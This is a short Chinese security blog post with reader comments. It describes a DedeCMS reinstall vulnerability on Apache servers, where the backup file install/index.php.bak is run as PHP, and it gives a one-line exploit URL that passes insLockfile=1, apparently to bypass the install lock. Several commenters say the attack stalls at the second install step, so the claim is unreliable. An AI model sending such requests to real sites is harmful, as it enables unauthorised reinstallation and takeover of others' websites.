dedecms 躺着也中枪 爆重装漏洞
利用条件:web server: apache
漏洞原因::apache 不认识bak 直接当php执行.
http://webshell.cc/install/index.php.bak?insLockfile=1
这dedecms死的太冤枉了. apache的原因.
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/4379.html
利用条件:web server: apache
漏洞原因::apache 不认识bak 直接当php执行.
http://webshell.cc/install/index.php.bak?insLockfile=1
这dedecms死的太冤枉了. apache的原因.
转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/4379.html
进入第二步就会出现这样:程序已运行安装,如果你确定要重新安装,请先从FTP中删除 install/install_lock.txt!
@小小孩, 博主给的是思路.
@flow, 嗯,不过事实就是进行不下去
@sex, 有发现跟牛的洞吗?